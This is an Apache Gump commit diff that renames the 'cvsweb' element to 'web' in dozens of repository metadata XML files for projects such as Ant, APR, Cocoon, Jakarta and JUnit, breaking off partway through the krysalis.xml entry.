============================================================================== --- gump/metadata/repository/ant.xml (original) +++ gump/metadata/repository/ant.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="ant" type="svn"> <title>Ant</title> <home-page>http://ant.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/ant/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/ant/?root=Apache-SVN</web> <redistributable/> <url>http://svn.apache.org/repos/asf/ant/</url> </repository> Modified: gump/metadata/repository/antbook.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/antbook.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/antbook.xml (original) +++ gump/metadata/repository/antbook.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="antbook" type="cvs"> <title>Examples for Java Development with Ant</title> <home-page>http://sourceforge.net/</home-page> - <cvsweb>http://smartfrog.cvs.sourceforge.net/antbook/</cvsweb> + <web>http://smartfrog.cvs.sourceforge.net/antbook/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/antworks.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/antworks.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/antworks.xml (original) +++ gump/metadata/repository/antworks.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="antworks" type="cvs"> <title>Antworks</title> <home-page>http://antworks.sourceforge.net/</home-page> - <cvsweb>http://antworks.cvs.sourceforge.net/</cvsweb> + <web>http://antworks.cvs.sourceforge.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/aopalliance.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/aopalliance.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/aopalliance.xml (original) +++ gump/metadata/repository/aopalliance.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="aopalliance" type="cvs"> <title>AOP Alliance (Java/J2EE AOP standards)</title> <home-page>http://aopalliance.sourceforge.net/</home-page> - <cvsweb>http://ant-contrib.cvs.sourceforge.net/</cvsweb> + <web>http://ant-contrib.cvs.sourceforge.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/apache-httpd.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/apache-httpd.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/apache-httpd.xml (original) +++ gump/metadata/repository/apache-httpd.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache HTTP Server</title> <home-page>http://httpd.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/httpd/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/httpd/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/httpd/</url> Modified: gump/metadata/repository/apache-incubator-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/apache-incubator-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/apache-incubator-svn.xml (original) +++ gump/metadata/repository/apache-incubator-svn.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Incubator Projects in Subversion</title> <home-page>http://incubator.apache.org</home-page> - <cvsweb>http://svn.apache.org/repos/asf/incubator/</cvsweb> + <web>http://svn.apache.org/repos/asf/incubator/</web> <url>http://svn.apache.org/repos/asf/incubator/</url> Modified: gump/metadata/repository/apr.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/apr.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/apr.xml (original) +++ gump/metadata/repository/apr.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Portable Runtime</title> <home-page>http://apr.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/apr/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/apr/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/apr/</url> Modified: gump/metadata/repository/asf.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/asf.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/asf.xml (original) +++ gump/metadata/repository/asf.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Software Foundation</title> <home-page>http://www.apache.org</home-page> - <cvsweb>http://svn.apache.org/viewvc/</cvsweb> + <web>http://svn.apache.org/viewvc/</web> <url>http://svn.apache.org/repos/asf/</url> Modified: gump/metadata/repository/avalon-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/avalon-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/avalon-svn.xml (original) +++ gump/metadata/repository/avalon-svn.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://avalon.apache.org</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/avalon/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/avalon/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/avalon/</url> Modified: gump/metadata/repository/avalon.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/avalon.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/avalon.xml (original) +++ gump/metadata/repository/avalon.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="avalon" type="cvs"> <title>Apache Avalon</title> <home-page>http://avalon.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/barcode4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/barcode4j.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/barcode4j.xml (original) +++ gump/metadata/repository/barcode4j.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="barcode4j" type="cvs"> <title>barcode4j</title> <home-page>http://barcode4j.krysalis.org</home-page> - <cvsweb>http://barcode4j.cvs.sourceforge.net/</cvsweb> + <web>http://barcode4j.cvs.sourceforge.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/beaver.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/beaver.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/beaver.xml (original) +++ gump/metadata/repository/beaver.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="beaver" type="cvs"> <title>beaver LALR(1) parser generator</title> <home-page>http://beaver.sourceforge.net/</home-page> - <cvsweb>http://beaver.cvs.sourceforge.net/</cvsweb> + <web>http://beaver.cvs.sourceforge.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/beepcore.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/beepcore.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/beepcore.xml (original) +++ gump/metadata/repository/beepcore.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="beepcore" type="cvs"> <title>BEEP is a new Internet standards-track protocol</title> <home-page>http://www.beepcore.org/</home-page> - <cvsweb>http://beepcore.cvs.sourceforge.net/</cvsweb> + <web>http://beepcore.cvs.sourceforge.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/cargo.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/cargo.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/cargo.xml (original) +++ gump/metadata/repository/cargo.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Cargo</title> <home-page>http://cargo.codehaus.org/</home-page> - <cvsweb>http://svn.codehaus.org/cargo/trunks/</cvsweb> + <web>http://svn.codehaus.org/cargo/trunks/</web> <url>http://svn.codehaus.org/cargo/trunks/</url> Modified: gump/metadata/repository/castor.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/castor.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/castor.xml (original) +++ gump/metadata/repository/castor.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="castor" type="svn"> <title>castor</title> <home-page>http://www.castor.org/</home-page> - <cvsweb>http://cvs.castor.codehaus.org/viewrep/castor/</cvsweb> + <web>http://cvs.castor.codehaus.org/viewrep/castor/</web> <url>http://svn.codehaus.org/castor/</url> Modified: gump/metadata/repository/classpath.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/classpath.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/classpath.xml (original) +++ gump/metadata/repository/classpath.xml Wed Feb 18 17:10:30 2009 @@ -2,7 +2,7 @@ <repository name="classpath" type="cvs"> <title>GNU Classpath</title> <home-page>http://www.classpath.org/</home-page> - <cvsweb>http://cvs.classpath.org/viewcvs/</cvsweb> + <web>http://cvs.classpath.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/cocoon.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/cocoon.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/cocoon.xml (original) +++ gump/metadata/repository/cocoon.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://cocoon.apache.org</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/cocoon/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/cocoon/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/cocoon/</url> Modified: gump/metadata/repository/cocoondev.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/cocoondev.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/cocoondev.xml (original) +++ gump/metadata/repository/cocoondev.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="cocoondev" type="svn"> <title>CocoonDev</title> <home-page>http://www.cocoondev.org/index.html</home-page> - <cvsweb>http://svn.cocoondev.org/</cvsweb> + <web>http://svn.cocoondev.org/</web> <url>http://svn.cocoondev.org/</url> </repository> Modified: gump/metadata/repository/codehaus-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/codehaus-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/codehaus-svn.xml (original) +++ gump/metadata/repository/codehaus-svn.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="codehaus-svn" type="svn"> <title>Annogen</title> <home-page>http://www.codehaus.org/</home-page> - <cvsweb>http://fisheye.codehaus.org/</cvsweb> + <web>http://fisheye.codehaus.org/</web> <url>http://svn.codehaus.org/</url> <redistributable/> </repository> Modified: gump/metadata/repository/codehaus.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/codehaus.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/codehaus.xml (original) +++ gump/metadata/repository/codehaus.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="codehaus" type="cvs"> <title>codehaus</title> <home-page>http://www.codehaus.org/</home-page> - <cvsweb>http://cvs.codehaus.org/</cvsweb> + <web>http://cvs.codehaus.org/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/codehaus_annogen.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/codehaus_annogen.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/codehaus_annogen.xml (original) +++ gump/metadata/repository/codehaus_annogen.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="codehaus_annogen" type="svn"> <title>Annogen</title> <home-page>http://annogen.codehaus.org/</home-page> - <cvsweb>http://svn.annogen.codehaus.org/</cvsweb> + <web>http://svn.annogen.codehaus.org/</web> <url>http://svn.codehaus.org/annogen/annogen/</url> <redistributable/> </repository> Modified: gump/metadata/repository/codehaus_projects.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/codehaus_projects.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/codehaus_projects.xml (original) +++ gump/metadata/repository/codehaus_projects.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="codehaus_projects" type="cvs"> <title>codehaus</title> <home-page>http://www.codehaus.org/</home-page> - <cvsweb>http://cvs.codehaus.org/</cvsweb> + <web>http://cvs.codehaus.org/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/codehaus_scm.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/codehaus_scm.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/codehaus_scm.xml (original) +++ gump/metadata/repository/codehaus_scm.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="codehaus_scm" type="cvs"> <title>codehaus_scm</title> <home-page>http://www.codehaus.org/</home-page> - <cvsweb>http://cvs.codehaus.org/viewcvs.cgi/</cvsweb> + <web>http://cvs.codehaus.org/viewcvs.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/commons-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/commons-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/commons-svn.xml (original) +++ gump/metadata/repository/commons-svn.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Commons</title> <home-page>http://commons.apache.org</home-page> - <cvsweb>http://svn.apache.org/viewvc/commons/</cvsweb> + <web>http://svn.apache.org/viewvc/commons/</web> <url>http://svn.apache.org/repos/asf/commons/</url> <redistributable/> Modified: gump/metadata/repository/db-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/db-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/db-svn.xml (original) +++ gump/metadata/repository/db-svn.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache DB</title> <home-page>http://db.apache.org</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/db/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/db/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/db/</url> Modified: gump/metadata/repository/db.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/db.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/db.xml (original) +++ gump/metadata/repository/db.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="db" type="cvs"> <title>Apache DB Project</title> <home-page>http://db.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/dbxml.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/dbxml.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/dbxml.xml (original) +++ gump/metadata/repository/dbxml.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="dbxml" type="cvs"> <title>dbXML</title> <home-page>http://www.dbxml.org/</home-page> - <cvsweb></cvsweb> + <web></web> <root> <method>pserver</method> Modified: gump/metadata/repository/directory.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/directory.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/directory.xml (original) +++ gump/metadata/repository/directory.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Directory</title> <home-page>http://directory.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/directory/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/directory/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/directory/</url> Modified: gump/metadata/repository/eclipse.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/eclipse.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/eclipse.xml (original) +++ gump/metadata/repository/eclipse.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="eclipse" type="cvs" compress="-z0"> <title>Eclipse</title> <home-page>http://eclipse.org/</home-page> - <cvsweb>http://dev.eclipse.org/viewcvs/index.cgi/</cvsweb> + <web>http://dev.eclipse.org/viewcvs/index.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/excalibur-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/excalibur-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/excalibur-svn.xml (original) +++ gump/metadata/repository/excalibur-svn.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://excalibur.apache.org</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://svn.apache.org/repos/asf/excalibur/</cvsweb> + <web>http://svn.apache.org/repos/asf/excalibur/</web> <url>http://svn.apache.org/repos/asf/excalibur/</url> Modified: gump/metadata/repository/exolab.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/exolab.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/exolab.xml (original) +++ gump/metadata/repository/exolab.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="exolab" type="cvs" compress="-z0"> <title>ExoLab</title> <home-page>http://www.exolab.org/</home-page> - <cvsweb>http://virtuals.intalio.com/cgi-bin/cvsweb.cgi/castor/?cvsroot=castor</cvsweb> + <web>http://virtuals.intalio.com/cgi-bin/cvsweb.cgi/castor/?cvsroot=castor</web> <root> <method>pserver</method> Modified: gump/metadata/repository/forrest.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/forrest.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/forrest.xml (original) +++ gump/metadata/repository/forrest.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Forrest</title> <home-page>http://forrest.apache.org/</home-page> - <cvsweb>http://svn.apache.org/viewcvs.cgi/forrest/?root=Apache-SVN</cvsweb> + <web>http://svn.apache.org/viewcvs.cgi/forrest/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/forrest/</url> Modified: gump/metadata/repository/geronimo.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/geronimo.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/geronimo.xml (original) +++ gump/metadata/repository/geronimo.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Geronimo</title> <home-page>http://geronimo.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/geronimo/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/geronimo/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/geronimo/</url> Modified: gump/metadata/repository/ggf-cddlm.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/ggf-cddlm.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/ggf-cddlm.xml (original) +++ gump/metadata/repository/ggf-cddlm.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="ggf-cddlm" type="cvs"> <title>GGF deployment standard on SourceForge</title> <home-page>http://sourceforge.net/</home-page> - <cvsweb>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</cvsweb> + <web>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/gleamynode.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/gleamynode.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/gleamynode.xml (original) +++ gump/metadata/repository/gleamynode.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Gleamynode.net</title> <home-page>http://gleamynode.net/dev/</home-page> - <cvsweb>http://wush.net/svn/trustin/tl-netty2/trunk/</cvsweb> + <web>http://wush.net/svn/trustin/tl-netty2/trunk/</web> <url>http://wush.net/svn/trustin/</url> Modified: gump/metadata/repository/hamcrest.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/hamcrest.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/hamcrest.xml (original) +++ gump/metadata/repository/hamcrest.xml Wed Feb 18 17:10:30 2009 @@ -19,6 +19,6 @@ <repository name="hamcrest" type="svn"> <title>hamcrest</title> <home-page>http://code.google.com/p/hamcrest/</home-page> - <cvsweb>http://hamcrest.googlecode.com/svn/</cvsweb> + <web>http://hamcrest.googlecode.com/svn/</web> <url>http://hamcrest.googlecode.com/svn/</url> </repository> Modified: gump/metadata/repository/htmlparser.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/htmlparser.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/htmlparser.xml (original) +++ gump/metadata/repository/htmlparser.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="htmlparser" type="cvs"> <title>HTML Parser</title> <home-page>http://htmlparser.sourceforge.net/</home-page> - <cvsweb>http://htmlparser.cvs.sourceforge.net/</cvsweb> + <web>http://htmlparser.cvs.sourceforge.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/httpcomponents.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/httpcomponents.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/httpcomponents.xml (original) +++ gump/metadata/repository/httpcomponents.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache HttpComponents</title> <home-page>http://httpcomponents.apache.org</home-page> - <cvsweb>http://svn.apache.org/viewvc/httpcomponents/</cvsweb> + <web>http://svn.apache.org/viewvc/httpcomponents/</web> <url>http://svn.apache.org/repos/asf/httpcomponents/</url> Modified: gump/metadata/repository/incubator.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/incubator.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/incubator.xml (original) +++ gump/metadata/repository/incubator.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="incubator" type="cvs"> <title>Apache Incubator</title> <home-page>http://incubator.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/intalio.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/intalio.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/intalio.xml (original) +++ gump/metadata/repository/intalio.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="intalio" type="cvs"> <title>Intalio</title> <home-page>http://virtuals.intalio.com/</home-page> - <cvsweb>http://virtuals.intalio.com/cgi-bin/cvsweb.cgi/</cvsweb> + <web>http://virtuals.intalio.com/cgi-bin/cvsweb.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/jacorb.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/jacorb.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/jacorb.xml (original) +++ gump/metadata/repository/jacorb.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="jacorb" type="cvs"> <title>JacORB</title> <home-page>http://www.jacorb.org/</home-page> - <cvsweb>http://www.jacorb.org/cgi-bin/cvsweb</cvsweb> + <web>http://www.jacorb.org/cgi-bin/cvsweb</web> <root> <method>pserver</method> Modified: gump/metadata/repository/jakarta-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/jakarta-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/jakarta-svn.xml (original) +++ gump/metadata/repository/jakarta-svn.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Jakarta</title> <home-page>http://jakarta.apache.org</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/jakarta/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/jakarta/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/jakarta/</url> Modified: gump/metadata/repository/jakarta.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/jakarta.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/jakarta.xml (original) +++ gump/metadata/repository/jakarta.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="jakarta" type="cvs"> <title>Jakarta</title> <home-page>http://jakarta.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/james.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/james.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/james.xml (original) +++ gump/metadata/repository/james.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="james" type="svn"> <title>James</title> <home-page>http://james.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/james/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/james/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/james/</url> <redistributable/> </repository> Modified: gump/metadata/repository/jamonapi.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/jamonapi.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/jamonapi.xml (original) +++ gump/metadata/repository/jamonapi.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="jamonapi" type="cvs"> <title>Java Application Monitor</title> <home-page>http://jamonapi.sourceforge.net/</home-page> - <cvsweb>http://jamonapi.cvs.sourceforge.net/jamonapi/</cvsweb> + <web>http://jamonapi.cvs.sourceforge.net/jamonapi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/javanet.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/javanet.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/javanet.xml (original) +++ gump/metadata/repository/javanet.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="java.net" type="cvs"> <title>dev.java.net</title> <home-page>http://dev.java.net/</home-page> - <cvsweb>http://dev.java.net/</cvsweb> + <web>http://dev.java.net/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/jboss.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/jboss.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/jboss.xml (original) +++ gump/metadata/repository/jboss.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="jboss" type="cvs"> <title>JBoss</title> <home-page>http://jboss.org/</home-page> - <cvsweb>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</cvsweb> + <web>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/jdom.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/jdom.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/jdom.xml (original) +++ gump/metadata/repository/jdom.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="jdom" type="cvs"> <title>JDOM</title> <home-page>http://www.jdom.org/</home-page> - <cvsweb>http://cvs.jdom.org/</cvsweb> + <web>http://cvs.jdom.org/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/junit.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/junit.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/junit.xml (original) +++ gump/metadata/repository/junit.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="junit" type="cvs"> <title>JUnit Test Framework</title> <home-page>http://sourceforge.net/</home-page> - <cvsweb>http://junit.cvs.sourceforge.net/junit/</cvsweb> + <web>http://junit.cvs.sourceforge.net/junit/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/kaffe.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/kaffe.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/kaffe.xml (original) +++ gump/metadata/repository/kaffe.xml Wed Feb 18 17:10:30 2009 @@ -2,7 +2,7 @@ <repository name="kaffe" type="cvs"> <title>Kaffe</title> <home-page>http://www.kaffe.org/</home-page> - <cvsweb>http://cvs.kaffe.org/viewcvs/</cvsweb> + <web>http://cvs.kaffe.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/krysalis.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/krysalis.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/krysalis.xml (original) +++ gump/metadata/repository/krysalis.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="krysalis" type="cvs"> <title>SourceForge</title> <home-page>http://sourceforge.net/</home-page> - <cvsweb>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</cvsweb> + 